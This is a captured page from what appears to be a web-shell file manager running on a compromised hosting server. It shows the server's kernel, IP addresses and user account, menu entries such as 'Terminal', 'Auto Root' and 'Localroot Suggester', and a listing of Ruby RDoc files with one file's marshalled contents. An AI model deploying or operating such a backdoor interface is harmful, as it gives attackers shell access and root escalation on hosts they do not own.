Linux server1.dn-server.com 4.18.0-553.89.1.lve.el8.x86_64 #1 SMP Wed Dec 10 13:58:50 UTC 2025 x86_64
LiteSpeed
Server IP : 195.201.204.189 & Your IP : 216.73.217.130
Domains :
Cant Read [ /etc/named.conf ]
User : beriska1
Terminal
Auto Root
Create File
Create Folder
Localroot Suggester
Backdoor Destroyer
Readme
/
opt /
alt /
ruby34 /
share /
ri /
system /
Thread /
Mutex /
Delete
Unzip
Name
Size
Permission
Date
Action
cdesc-Mutex.ri
1.06
KB
-rw-r--r--
2026-04-07 16:51
lock-i.ri
423
B
-rw-r--r--
2026-04-07 16:51
locked%3f-i.ri
371
B
-rw-r--r--
2026-04-07 16:51
new-c.ri
319
B
-rw-r--r--
2026-04-07 16:51
owned%3f-i.ri
371
B
-rw-r--r--
2026-04-07 16:51
sleep-i.ri
836
B
-rw-r--r--
2026-04-07 16:51
synchronize-i.ri
462
B
-rw-r--r--
2026-04-07 16:51
try_lock-i.ri
412
B
-rw-r--r--
2026-04-07 16:51
unlock-i.ri
394
B
-rw-r--r--
2026-04-07 16:51
Save
Rename
U:RDoc::AnyMethod[iI" sleep:ETI"Thread::Mutex#sleep;TF:publico:RDoc::Markup::Document:@parts[o:RDoc::Markup::Paragraph; [I"GReleases the lock and sleeps +timeout+ seconds if it is given and ;TI"Knon-nil or forever. Raises +ThreadError+ if +mutex+ wasn't locked by ;TI"the current thread.;To:RDoc::Markup::BlankLine o; ; [I"DWhen the thread is next woken up, it will attempt to reacquire ;TI"the lock.;T@o; ; [I"KNote that this method can wakeup without explicit Thread#wakeup call. ;TI"-For example, receiving signal and so on.;T@o; ; [I"JReturns the slept time in seconds if woken up, or +nil+ if timed out.;T: @fileI"thread_sync.c;T:0@omit_headings_from_table_of_contents_below0I"4mutex.sleep(timeout = nil) -> number or nil ;T0[ I"(*args);T@FI" Mutex;TcRDoc::NormalClass00